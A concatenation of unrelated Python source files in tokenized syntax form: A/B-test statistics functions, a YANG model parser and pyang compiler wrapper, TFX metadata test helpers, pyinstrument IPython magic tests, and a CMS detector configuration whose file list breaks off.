<import_stmt>numpy<as>np<import_stmt>scipy.stats<def_stmt>t_test a b<block_start>""" Calculates two-sided t-test p-values for multiple experiments :param a: np.array shape (n_experiments, n_users), metric values in control group :param b: np.array shape (n_experiments, n_users), metric values in treatment group :return: np.array shape (n_experiments), two-sided p-values of t-test in all experimetns """<line_sep>result=list(map(<lambda>x:scipy.stats.ttest_ind(x[0] x[1]).pvalue zip(a b)))<line_sep><return>np.array(result)<block_end><def_stmt>mannwhitney a b<block_start>""" Calculates two-sided t-test p-values for multiple experiments :param a: np.array shape (n_experiments, n_users), metric values in control group :param b: np.array shape (n_experiments, n_users), metric values in treatment group :return: np.array shape (n_experiments), two-sided p-values of Mann-Whitney test in all experimetns """<line_sep>result=list(map(<lambda>x:scipy.stats.mannwhitneyu(x[0] x[1] alternative='two-sided').pvalue zip(a b)))<line_sep><return>np.array(result)<block_end><def_stmt>get_smoothed_ctrs clicks_0 views_0 clicks_1 views_1 smothing_factor=200.<block_start>""" Calculates smoothed ctr for every user in every experiment both in treatment and control groups Smoothed_ctr = (user_clicks + smothing_factor * global_ctr) / (user_views + smothing_factor) :param clicks_0: np.array shape (n_experiments, n_users), clicks of every user from control group in every experiment :param views_0: np.array shape (n_experiments, n_users), views of every user from control group in every experiment :param clicks_1: np.array shape (n_experiments, n_users), clicks of every user from treatment group in every experiment :param views_1: np.array shape (n_experiments, n_users), views of every user from treatment group in every experiment :param smothing_factor: float :return: (np.array, np.array) shape (n_experiments, n_users), smoothed ctrs for every user in every experiment """<line_sep>global_ctr=(np.sum(clicks_0 axis=1)/np.sum(views_0 axis=1)).reshape(-1 1)<line_sep>ctrs_0=(clicks_0+smothing_factor<times>global_ctr)/(views_0+smothing_factor)<line_sep>ctrs_1=(clicks_1+smothing_factor<times>global_ctr)/(views_1+smothing_factor)<line_sep><return>ctrs_0 ctrs_1<block_end><def_stmt>bootstrap ctrs_0 weights_0 ctrs_1 weights_1 n_bootstrap=2000<block_start>""" Does weighted bootstrap and calculates p-value according to the bootstraped distribution :param ctrs_0: np.array shape (n_experiments, n_users), CTRs of every user from control group in every experiment :param weights_0: np.array (n_experiments, n_users), weight of every user from control group in every experiment :param ctrs_1: np.array (n_experiments, n_users), CTRs of every user from treatment group in every experiment :param weights_1: np.array (n_experiments, n_users), weight of every user from treatment group in every experiment :param n_bootstrap: int - for every experiment wi will generate n_bootstrap bootstrap pseudo-samples :return: np.array shape (n_experiments), two-sided p-values of weighted bootstrap test in all experimetns """<line_sep>poisson_bootstraps=scipy.stats.poisson(1).rvs((n_bootstrap ctrs_0.shape[1])).astype(np.int64)<line_sep>values_0=np.matmul(ctrs_0<times>weights_0 poisson_bootstraps.T)<line_sep>weights_0=np.matmul(weights_0 poisson_bootstraps.T)<line_sep>values_1=np.matmul(ctrs_1<times>weights_1 poisson_bootstraps.T)<line_sep>weights_1=np.matmul(weights_1 poisson_bootstraps.T)<line_sep>deltas=values_1/weights_1-values_0/weights_0<line_sep>positions=np.sum(deltas<l>0 axis=1)<line_sep><return>2<times>np.minimum(positions n_bootstrap-positions)/n_bootstrap<block_end><def_stmt>bucketization ctrs_0 weights_0 ctrs_1 weights_1 n_buckets=200<block_start>""" Does weighted bucketization and calculates p-values for all experiments using t_test :param ctrs_0: np.array shape (n_experiments, n_users), CTRs of every user from control group in every experiment :param weights_0: np.array (n_experiments, n_users), weight of every user from control group in every experiment :param ctrs_1: np.array (n_experiments, n_users), CTRs of every user from treatment group in every experiment :param weights_1: np.array (n_experiments, n_users), weight of every user from treatment group in every experiment :param n_buckets: int, nubmer of buckets :return: np.array shape (n_experiments), two-sided p-values of weighted bucketization test in all the experimetns """<line_sep>n_experiments,n_users=ctrs_0.shape<line_sep>values_0=np.zeros((n_experiments n_buckets))<line_sep>values_1=np.zeros((n_experiments n_buckets))<for_stmt>b np.arange(n_buckets)<block_start>ind=np.arange(b<times>n_users/n_buckets b<times>n_users/n_buckets+n_users/n_buckets).astype(np.int)<line_sep>values_0[: b]=np.sum(ctrs_0[: ind]<times>weights_0[: ind] axis=1)/np.sum(weights_0[: ind] axis=1)<line_sep>values_1[: b]=np.sum(ctrs_1[: ind]<times>weights_1[: ind] axis=1)/np.sum(weights_1[: ind] axis=1)<block_end><return>t_test(values_0 values_1)<block_end><def_stmt>binomial_test global_ctr_0 total_views_0 global_ctr_1 total_views_1<block_start>""" Calculates two-sided p-values for all the experiments on global CTRs using z-test :param global_ctr_0: np.array shape (n_experiments), global ctr in control group in every experiment :param total_views_0: np.array shape (n_experiments), sum of views in control group in every experiment :param global_ctr_1: np.array shape (n_experiments), global ctr in treatment group in every experiment :param total_views_1: np.array shape (n_experiments), sum of views in treatment group in every experiment :return: np.array shape (n_experiments), two-sided p-values of delta-method on CTRs in all the experimetns """<line_sep>overall_ctrs=(global_ctr_0<times>total_views_0+global_ctr_1<times>total_views_1)/(total_views_0+total_views_1)<line_sep>z_stats=(global_ctr_0-global_ctr_1)/np.sqrt(overall_ctrs<times>(1-overall_ctrs)<times>(1./total_views_0+1./total_views_1))<line_sep><return>2<times>np.minimum(scipy.stats.norm(0 1).cdf(z_stats) 1-scipy.stats.norm(0 1).cdf(z_stats))<block_end><def_stmt>delta_method_ctrs clicks_0 views_0 clicks_1 views_1<block_start>""" Calculates two-sided p-values for all the experiments on CTRs using delta-method :param clicks_0: np.array shape (n_experiments, n_users), clicks of every user from control group in every experiment :param views_0: np.array shape (n_experiments, n_users), views of every user from control group in every experiment :param clicks_1: np.array shape (n_experiments, n_users), clicks of every user from treatment group in every experiment :param views_1: np.array shape (n_experiments, n_users), views of every user from treatment group in every experiment :return: np.array shape (n_experiments), two-sided p-values of delta-method on CTRs in all the experimetns """<line_sep>n_experiments,n_users=views_0.shape<line_sep>mean_clicks_0,var_clicks_0=np.mean(clicks_0 axis=1) np.var(clicks_0 axis=1)<line_sep>mean_clicks_1,var_clicks_1=np.mean(clicks_1 axis=1) np.var(clicks_1 axis=1)<line_sep>mean_views_0,var_views_0=np.mean(views_0 axis=1) np.var(views_0 axis=1)<line_sep>mean_views_1,var_views_1=np.mean(views_1 axis=1) np.var(views_1 axis=1)<line_sep>cov_0=np.mean((clicks_0-mean_clicks_0.reshape(-1 1))<times>(views_0-mean_views_0.reshape(-1 1)) axis=1)<line_sep>cov_1=np.mean((clicks_1-mean_clicks_1.reshape(-1 1))<times>(views_1-mean_views_1.reshape(-1 1)) axis=1)<line_sep>var_0=var_clicks_0/mean_views_0<power>2+var_views_0<times>mean_clicks_0<power>2/mean_views_0<power>4-2<times>mean_clicks_0/mean_views_0<power>3<times>cov_0<line_sep>var_1=var_clicks_1/mean_views_1<power>2+var_views_1<times>mean_clicks_1<power>2/mean_views_1<power>4-2<times>mean_clicks_1/mean_views_1<power>3<times>cov_1<line_sep>ctrs_0=np.sum(clicks_0 axis=1)/np.sum(views_0 axis=1)<line_sep>ctrs_1=np.sum(clicks_1 axis=1)/np.sum(views_1 axis=1)<line_sep>z_stats=(ctrs_1-ctrs_0)/np.sqrt(var_0/n_users+var_1/n_users)<line_sep>p_ctr_delta=2<times>np.minimum(scipy.stats.norm(0 1).cdf(z_stats) 1-scipy.stats.norm(0 1).cdf(z_stats))<line_sep><return>p_ctr_delta<block_end><def_stmt>intra_user_correlation_aware_weights clicks_0 views_0 views_1<block_start>""" Calculates weights for UMVUE global ctr estimate for every user in every experiment both in treatment and control groups :param clicks_0: np.array shape (n_experiments, n_users), clicks of every user from control group in every experiment :param views_0: np.array shape (n_experiments, n_users), views of every user from control group in every experiment :param views_1: np.array shape (n_experiments, n_users), views of every user from treatment group in every experiment :return: (np.array, np.array) shape (n_experiments, n_users), weights for every user in every experiment """<line_sep>ri=clicks_0/views_0<line_sep>s3=clicks_0<times>(1-ri)<power>2+(views_0-clicks_0)<times>ri<power>2<line_sep>s3=np.sum(s3 axis=1)/np.sum(views_0-1 axis=1)<line_sep>rb=np.mean(clicks_0/views_0 axis=1).reshape(-1 1)<line_sep>s2=clicks_0<times>(1-rb)<power>2+(views_0-clicks_0)<times>rb<power>2<line_sep>s2=np.sum(s2 axis=1)/(np.sum(views_0 axis=1)-1)<line_sep>rho=np.maximum(0 1-s3/s2).reshape(-1 1)<line_sep>w_0=views_0/(1+(views_0-1)<times>rho)<line_sep>w_1=views_1/(1+(views_1-1)<times>rho)<line_sep><return>w_0 w_1<block_end><def_stmt>linearization_of_clicks clicks_0 views_0 clicks_1 views_1<block_start>""" Fits linear model clicks = k * views and returns clicks - k * views (e.g. it accounts for correlation of clicks and views) :param clicks_0: np.array shape (n_experiments, n_users), clicks of every user from control group in every experiment :param views_0: np.array shape (n_experiments, n_users), views of every user from control group in every experiment :param clicks_1: np.array shape (n_experiments, n_users), clicks of every user from treatment group in every experiment :param views_1: np.array shape (n_experiments, n_users), views of every user from treatment group in every experiment :return: (np.array, np_array) shape (n_experiments), linearized clicks for every user in every experiment """<line_sep>k=clicks_0.flatten().sum()/views_0.flatten().sum()<line_sep>L_0=clicks_0-k<times>views_0<line_sep>L_1=clicks_1-k<times>views_1<line_sep><return>L_0 L_1<block_end><def_stmt>permutation_test clicks_0:np.ndarray views_0:np.ndarray clicks_1:np.ndarray views_1:np.ndarray samples:int=2000<arrow>np.ndarray<block_start>n_experiments=views_0.shape[0]<line_sep>n_users_0=views_0.shape[1]<line_sep>n_users_1=views_1.shape[1]<line_sep>permutations=np.zeros((samples n_users_0+n_users_1)).astype(np.int32)<line_sep>permutation=np.arange(n_users_0+n_users_1)<for_stmt>i range(samples)<block_start>np.random.shuffle(permutation)<line_sep>permutations[i]=permutation.copy()<block_end>permutation_flags=(permutations<l>n_users_0).astype(np.int32)<line_sep>concated_views=np.hstack((views_0 views_1))<line_sep>concated_clicks=np.hstack((clicks_0 clicks_1))<line_sep>clicks_sum_0=np.matmul(concated_clicks permutation_flags.T)<line_sep>clicks_sum_1=np.matmul(concated_clicks 1-permutation_flags.T)<line_sep>views_sum_0=np.matmul(concated_views permutation_flags.T)<line_sep>views_sum_1=np.matmul(concated_views 1-permutation_flags.T)<line_sep>null_stats=clicks_sum_1/views_sum_1-clicks_sum_0/views_sum_0<line_sep>null_stats=np.sort(null_stats)<line_sep>p_values=np.zeros(n_experiments)<for_stmt>i range(n_experiments)<block_start>exp_stat=clicks_1[i].sum()/views_1[i].sum()-clicks_0[i].sum()/views_0[i].sum()<line_sep>insert_position=np.searchsorted(null_stats[i] exp_stat)<line_sep>p_values[i]=2<times>np.minimum(samples-insert_position insert_position)/samples<block_end><return>p_values<block_end>
""" Copyright 2015, Cisco Systems, Inc Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. @author: <NAME>, Cisco Systems, Inc. """<import_stmt>os<import_stmt>re<import_stmt>glob<import_stmt>logging<import_stmt>subprocess<import_from_stmt>sets Set<import_stmt>lxml.etree<as>ET<import_from_stmt>django.conf settings<import_from_stmt>explorer.utils.dygraph DYGraph<import_from_stmt>explorer.utils.misc ServerSettings<class_stmt>Parser(object)<block_start>""" Basic Yang modulename parser """<def_stmt>__init__ self filename<block_start>self.module=<none><line_sep>self.revision=<none><line_sep>self.imports=[]<line_sep>self.includes=[]<if_stmt><not>os.path.exists(filename)<block_start><return><block_end>module_re=re.compile("""^\s*[sub]*module\s+['"]?\s*([\w+[\-\w+]+)\s*['"]?\s*""")<line_sep>revision_re=re.compile("""^\s*revision\s+['"]?\s*(\w+-\w+-\w+)\s*['"]?\s*""")<line_sep>import_re=re.compile("""^\s*import\s+['"]?\s*([\w+[\-\w+]+)\s*['"]?\s*""")<line_sep>include_re=re.compile("""^\s*include\s+['"]?\s*([\w+[\-\w+]+)\s*['"]?\s*""")<with_stmt>open(filename 'r')<as>f<block_start><for_stmt>line f<block_start><if_stmt>self.module<is><none><block_start>res=module_re.match(line)<if_stmt>res<is><not><none><block_start>self.module=res.group(1).strip()<line_sep><continue><block_end><block_end>imp=import_re.match(line)<if_stmt>imp<is><not><none><block_start>self.imports.append(imp.group(1).strip())<line_sep><continue><block_end>inc=include_re.match(line)<if_stmt>inc<is><not><none><block_start>self.includes.append(inc.group(1).strip())<line_sep><continue><block_end>res=revision_re.match(line)<if_stmt>res<is><not><none><block_start>self.revision=res.group(1).strip()<line_sep><break><block_end><block_end><block_end><if_stmt>self.module<is><none><block_start>logging.error('Could not parse modulename, uploaded file may be corrupted !!')<block_end><block_end><def_stmt>get_filename self<block_start>""" Returns: yang file name with version suffix. """<if_stmt>self.revision<block_start><return>self.module+'@'+self.revision+'.yang'<block_end><return>self.module+'.yang'<block_end><def_stmt>get_dependency self<block_start>""" Returns: List of dependency (yang imports and includes) """<line_sep><return>self.imports+self.includes<block_end><def_stmt>__str__ self<block_start><return>self.get_filename()+' -> '+str(self.get_dependency())<block_end><block_end><class_stmt>Compiler(object)<block_start>""" Compile yang models into cxml """<line_sep>@staticmethod<def_stmt>compile_cxml username session filename<block_start>""" Compile yang model and return tuple (boolean, list-of-errors) """<line_sep>logging.debug('Compiling %s .. !!'%filename)<line_sep>plugins=os.path.join(settings.BASE_DIR 'explorer' 'plugins')<if_stmt><not>os.path.exists(plugins)<block_start>logging.error('CXML Plugin directory is missing .. !!')<line_sep><return><false> <none><block_end><if_stmt>subprocess.call(['which' 'pyang'])<ne>0<block_start>logging.error('Could not find pyang compiler, please install pyang .. !!')<line_sep><return><false> <none><block_end>basename=os.path.basename(filename)<line_sep>modulename=basename.split('.')[0].strip()<line_sep>session_dir=''<if_stmt>session<is><not><none><block_start>session_dir=ServerSettings.session_path(session)<if_stmt><not>os.path.exists(session_dir)<block_start>logging.error('compile_cxml: Session directory %s not found !!' session_dir)<line_sep><return><false> ["Session error !!"]<block_end>yangfile=os.path.join(session_dir modulename+'.yang')<line_sep>cxmlfile=os.path.join(session_dir modulename+'.xml')<block_end><else_stmt><block_start>yangfile=os.path.join(ServerSettings.yang_path(username) modulename+'.yang')<line_sep>cxmlfile=os.path.join(ServerSettings.cxml_path(username) modulename+'.xml')<block_end># Verify if yang file exists <if_stmt><not>os.path.exists(yangfile)<block_start>logging.debug("compile_cxml: "+yangfile+' not found !!')<line_sep><return><false> ["Yang module %s not found on server !!"%modulename]<block_end>command=['pyang' '-f' 'cxml' '--plugindir' 'explorer/plugins' '-p']<line_sep># include path for pyang compilation includes=ServerSettings.yang_path(username)<if_stmt>session_dir<block_start>includes<augadd>':'+session_dir<block_end>command.append(includes)<line_sep># include dependent models command<augadd>Compiler.get_dependencies(username [filename] session)<line_sep># finally add target module command.append(yangfile)<line_sep># create a callback to handle empty output <def_stmt>empty_callback outfile<block_start>module=os.path.basename(outfile)<line_sep>module=module.split('.')[0]<line_sep>module=module.split('@')[0]<line_sep>node=ET.Element('node')<line_sep>node.set('name' module)<line_sep>node.set('type' 'module')<with_stmt>open(outfile 'w')<as>fd<block_start>fd.write(ET.tostring(node))<block_end>logging.debug('compile_cxml: Empty output from pyang, created default cxml!!')<block_end><return>Compiler.invoke_compile(command cxmlfile empty_callback)<block_end>@staticmethod<def_stmt>compile_pyimport username session=<none><block_start>""" Compile yang model and return tuple (boolean, list-of-errors) """<line_sep>plugins=os.path.join(settings.BASE_DIR 'explorer' 'plugins')<if_stmt><not>os.path.exists(plugins)<block_start>logging.error('CXML Plugin directory is missing .. !!')<line_sep><return><false> <none><block_end><if_stmt>subprocess.call(['which' 'pyang'])<ne>0<block_start>logging.error('Could not find pyang compiler, please install pyang .. !!')<line_sep><return><false> <none><block_end>logging.debug('Rebuilding dependencies for user %s'%username)<line_sep># build include path includes=[ServerSettings.yang_path(username)]<if_stmt>session<is><not><none><block_start>session_dir=ServerSettings.session_path(session)<if_stmt><not>os.path.exists(session_dir)<block_start>logging.error('compile_pyimport: Session directory %s not found !!' session_dir)<line_sep><return><false> ["Session error !!"]<block_end>includes.append(session_dir)<line_sep>depfile=os.path.join(session_dir 'dependencies.xml')<block_end><else_stmt><block_start>depfile=os.path.join(includes[0] 'dependencies.xml')<block_end>target_yangs=[]<for_stmt>yang_dir includes<block_start><for_stmt>_file glob.glob(os.path.join(yang_dir '*.yang'))<block_start>target_yangs.append(_file)<block_end><block_end><if_stmt><not>target_yangs<block_start>logging.debug('compile_pyimport: No yang file found !!')<line_sep><return><true> ET.Element('messages')<block_end>command=['pyang' '-f' 'pyimport' '--plugindir' 'explorer/plugins' '-p']<line_sep>command<augadd>[':'.join(includes)]<line_sep>command<augadd>target_yangs<line_sep><return>Compiler.invoke_compile(command depfile)<block_end>@staticmethod<def_stmt>get_dependencies username modules session<block_start>""" return dependencies for given yang models """<line_sep>session_dir=''<line_sep>logging.debug("get_dependencies: Target Modules "+str(modules))<if_stmt>session<is><not><none><block_start>session_dir=ServerSettings.session_path(session)<line_sep>dfile=os.path.join(session_dir 'dependencies.xml')<block_end><else_stmt><block_start>dfile=os.path.join(ServerSettings.yang_path(username) 'dependencies.xml')<block_end><if_stmt><not>os.path.exists(dfile)<block_start>logging.error('get_dependencies: dependency file %s missing!!' dfile)<line_sep><return>[]<block_end><if_stmt>session_dir<block_start>session_files=[os.path.basename(_file)<for>_file glob.glob(os.path.join(session_dir '*.yang'))]<block_end>yang_path=ServerSettings.yang_path(username)<line_sep>yang_files=[os.path.basename(_file)<for>_file glob.glob(os.path.join(yang_path '*.yang'))]<line_sep>dmodules=Set([])<line_sep>dgraph=DYGraph(dfile)<for_stmt>m modules<block_start>module=dgraph.dependency_module(m)<if_stmt>module<is><none><block_start><continue><block_end><for_stmt>name module.imports<block_start>dmodules.add(name)<block_end><for_stmt>name module.includes<block_start>dmodules.add(name)<block_end><for_stmt>name module.depends<block_start>dmodules.add(name)<block_end><block_end>dmodules_list=list(dmodules)<line_sep>deplist=[]<for_stmt>_file dmodules_list# prefer freshly uploaded files <block_start><if_stmt>session_dir<block_start>depfile=_find_matching(_file session_dir session_files)<block_end><else_stmt><block_start>depfile=_find_matching(_file yang_path yang_files)<block_end><if_stmt>depfile<is><not><none><block_start>deplist.append(depfile)<block_end><else_stmt><block_start>logging.warning("get_dependencies: Dependency (%s) not satisfied, compilation may fail !!"%_file)<block_end><block_end>logging.debug("get_dependencies: Computed "+str(deplist))<line_sep><return>deplist<block_end>@staticmethod<def_stmt>invoke_compile command outfile empty_callback=<none><block_start>""" Invoke pyang compilation and return result """<line_sep>logging.debug("invoke_compile: CMD: "+str(command))<line_sep>p=subprocess.Popen(command stdout=subprocess.PIPE stderr=subprocess.PIPE)<line_sep>stdout,stderr=p.communicate()<line_sep>rc=<true><line_sep>lines=[]<if_stmt>stderr<block_start>lines=stderr.split('\n')<block_end><if_stmt>p.returncode<ne>0<block_start>logging.error('invoke_compile: Compile Errors: '+str(lines))<if_stmt>os.path.exists(outfile)<block_start>os.remove(outfile)<block_end>rc=<false><block_end><elif_stmt>stdout<block_start><with_stmt>open(outfile 'w')<as>fd<block_start>fd.write(stdout)<line_sep>logging.debug('invoke_compile: %s -> done' outfile)<block_end>logging.debug('invoke_compile: Compile Warning: '+str(lines))<block_end><else_stmt><block_start>logging.warning('invoke_compile: empty pyang output !!')<if_stmt>empty_callback<is><not><none><block_start>empty_callback(outfile)<block_end><block_end>messages=ET.Element('messages')<for_stmt>line lines<block_start>msg=ET.Element('message')<line_sep>msg.text=line<line_sep>messages.append(msg)<block_end><return>rc messages<block_end><block_end><def_stmt>_find_matching target directory modules<block_start>logging.debug('Searching target %s in %s'%(target directory))<if_stmt><not>modules<block_start>modules=[os.path.basename(_file)<for>_file glob.glob(os.path.join(directory '*.yang'))]<block_end><for_stmt>module modules<block_start><if_stmt>module<eq>target+'.yang'<block_start><return>os.path.join(directory module)<block_end><if_stmt>module.startswith(target+'@')<block_start><return>os.path.join(directory module)<block_end><block_end><return><none><block_end>
# Copyright 2020 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Utilities for reading pipelines in testdata."""<import_stmt>os<import_stmt>shutil<import_stmt>ml_metadata<as>mlmd<import_from_stmt>ml_metadata.proto metadata_store_pb2<line_sep># constants in a mlmd metadata store instance derived from a tfx pipeline _TEST_DATA_DIR=os.path.join(os.path.dirname(__file__) 'tfx_oss_0_21')<line_sep>_TFX_0_21_DB_FILE='metadata.sqlite'<line_sep>_TFX_0_21_PAYLOAD_DIR='/tmp/tfx-interactive-2020-03-24T21_31_20.888155-mny0kawj'<line_sep>TFX_0_21_METRICS_ARTIFACT_IDS=(9 11)<line_sep>TFX_0_21_MODEL_ARTIFACT_ID=8<line_sep>TFX_0_21_MODEL_DATASET_ID=2<line_sep>TFX_0_21_MODEL_URI=os.path.join(_TEST_DATA_DIR 'Trainer/model/6')<line_sep>TFX_0_21_STATS_ARTIFACT_ID=3<line_sep>TFX_0_21_TRAINER_ID=6<def_stmt>get_tfx_pipeline_metadata_store tmp_db_path:str<arrow>mlmd.MetadataStore<block_start>"""Copies and opens a metadata_store from the testdata tfx pipeline db. It migrates the db to the compatible schema at the head. In addition, it updates the stored artifacts' uri to the test data db path, so that the test code can open the testdata files mentioned in the database. Args: tmp_db_path: a temp path for copying the pipeline database. Returns: A ml-metadata store for the copied pipeline db. """<line_sep>testdata_db_path=os.path.join(_TEST_DATA_DIR _TFX_0_21_DB_FILE)<line_sep>shutil.copyfile(testdata_db_path tmp_db_path)<line_sep>connection_config=metadata_store_pb2.ConnectionConfig(sqlite=metadata_store_pb2.SqliteMetadataSourceConfig(filename_uri=tmp_db_path connection_mode=metadata_store_pb2.SqliteMetadataSourceConfig.READWRITE ))<line_sep># The pipeline db is created with mlmd 0.21, the test run from the head # may include newer mlmd schema versions. We migrate the db to newer # mlmd schema if needed. store=mlmd.MetadataStore(connection_config enable_upgrade_migration=<true>)<line_sep># The pipeline db is generated with real pipelines in which the payloads of # the artifacts are stored in the file system when the pipeline ran. We fix # the uri to point to the testdata payloads generated by the pipeline. fixed_artifacts=[]<for_stmt>artifact store.get_artifacts()<block_start>artifact.uri=artifact.uri.replace(_TFX_0_21_PAYLOAD_DIR _TEST_DATA_DIR)<line_sep>fixed_artifacts.append(artifact)<block_end>store.put_artifacts(fixed_artifacts)<line_sep><return>store<block_end>
<import_from_stmt>test.fake_time_util fake_time<import_stmt>pytest<line_sep># note: IPython should be imported within each test. Importing it in our tests # seems to cause problems with subsequent tests. cell_code=""" import time def function_a(): function_b() function_c() def function_b(): function_d() def function_c(): function_d() def function_d(): function_e() def function_e(): time.sleep(0.1) function_a() """<line_sep># Tests # @pytest.mark.ipythonmagic<def_stmt>test_magics ip<block_start><import_from_stmt>IPython.utils.io capture_output<as>capture_ipython_output<with_stmt>fake_time()<block_start><with_stmt>capture_ipython_output()<as>captured<block_start>ip.run_cell_magic("pyinstrument" line="" cell=cell_code)<block_end><block_end><assert_stmt>len(captured.outputs)<eq>1<line_sep>output=captured.outputs[0]<assert_stmt>"text/html"<in>output.data<assert_stmt>"text/plain"<in>output.data<assert_stmt>"function_a"<in>output.data["text/html"]<assert_stmt>"<iframe"<in>output.data["text/html"]<assert_stmt>"function_a"<in>output.data["text/plain"]<assert_stmt>"- 0.200 function_a"<in>output.data["text/plain"]<assert_stmt>"- 0.100 sleep"<in>output.data["text/plain"]<with_stmt>fake_time()<block_start><with_stmt>capture_ipython_output()<as>captured# this works because function_a was defined in the previous cell <block_start>ip.run_line_magic("pyinstrument" line="function_a()")<block_end><block_end><assert_stmt>len(captured.outputs)<eq>1<line_sep>output=captured.outputs[0]<assert_stmt>"function_a"<in>output.data["text/plain"]<assert_stmt>"- 0.100 sleep"<in>output.data["text/plain"]<block_end>@pytest.mark.ipythonmagic<def_stmt>test_magic_empty_line ip# check empty line input <block_start>ip.run_line_magic("pyinstrument" line="")<block_end># Utils # @pytest.fixture(scope="module")<def_stmt>session_ip <block_start><import_from_stmt>IPython.testing.globalipapp start_ipython<line_sep><yield>start_ipython()<block_end>@pytest.fixture(scope="function")<def_stmt>ip session_ip<block_start>session_ip.run_line_magic(magic_name="load_ext" line="pyinstrument")<line_sep><yield>session_ip<line_sep>session_ip.run_line_magic(magic_name="reset" line="-f")<block_end>
<import_stmt>FWCore.ParameterSet.Config<as>cms<line_sep>process=cms.Process("DigisSegments")<line_sep>process.load("Geometry.CMSCommonData.cmsIdealGeometryXML_cff")<line_sep>process.load("Geometry.DTGeometry.dtGeometry_cfi")<line_sep>process.DTGeometryESModule.applyAlignment=<false><line_sep>process.load("Configuration.StandardSequences.FrontierConditions_GlobalTag_cff")<line_sep>process.load("Configuration.StandardSequences.MagneticField_AutoFromDBCurrent_cff")<line_sep>process.GlobalTag.globaltag="90X_dataRun2_Express_v2"<line_sep>process.load("RecoLocalMuon.Configuration.RecoLocalMuon_cff")<line_sep>## DT unpacker process.load("EventFilter.DTRawToDigi.dtunpacker_cfi")<line_sep>process.muonDTDigis.inputLabel='rawDataCollector'<line_sep>process.source=cms.Source("PoolSource" fileNames=cms.untracked.vstring("/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/90000/A8CD55CA-1F94-E611-8017-0CC47A7C35A8.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/90000/5E3D3C6E-6594-E611-AB43-0CC47A4D7616.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/FEB68681-5A87-E611-9374-FA163EBB015F.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/F8A610D8-6287-E611-845E-FA163E57640C.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/F80380BB-7687-E611-84D6-02163E01653D.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/F4A6C6FD-B089-E611-9227-002590DE6E64.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/F40149E2-7387-E611-B057-0025904CF766.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/F21AA882-6C87-E611-8F39-FA163EA18210.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/F0A05CAE-5387-E611-BACB-FA163E9FDE85.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/F095A793-B389-E611-8A84-00259021A39E.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/EE733CB6-B189-E611-A2A6-B499BAAC054A.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/EA70D05E-4589-E611-BFE3-FA163E3F2846.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/E46AF903-6C87-E611-8658-FA163EDB91EF.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/E4332BCB-D687-E611-A9EA-0025905A6126.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/E09E85A0-EB86-E611-B17D-20CF3019DEEF.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/DEEA9DDD-E187-E611-B13B-FA163E73AE79.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/DA12BA92-B087-E611-B7A3-0242AC130002.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/D615D999-B189-E611-B46C-FA163E8E175A.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/D6055073-6E87-E611-8E91-FA163E8D8332.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/D4FD5F54-658B-E611-BED9-0CC47A4D7646.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/D029A3C8-4B89-E611-9D1F-FA163E631428.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/CE3E1EE9-9789-E611-998C-FA163ED21222.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/CCDC87DF-1A88-E611-9B2A-1CC1DE19274E.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/C8F8C3B2-5387-E611-B9FC-FA163E5669B0.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/C4B49819-F286-E611-B127-549F358EB76F.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/C2B91F86-5A87-E611-B7E7-02163E014C10.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/C09B5970-4B88-E611-9C48-901B0E5427A6.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/BE837F4E-9E87-E611-8DC8-3417EBE7047A.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/BAC10123-7787-E611-A0DE-02163E015FDF.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/B856E93F-E586-E611-BA74-FA163E1909D1.root" 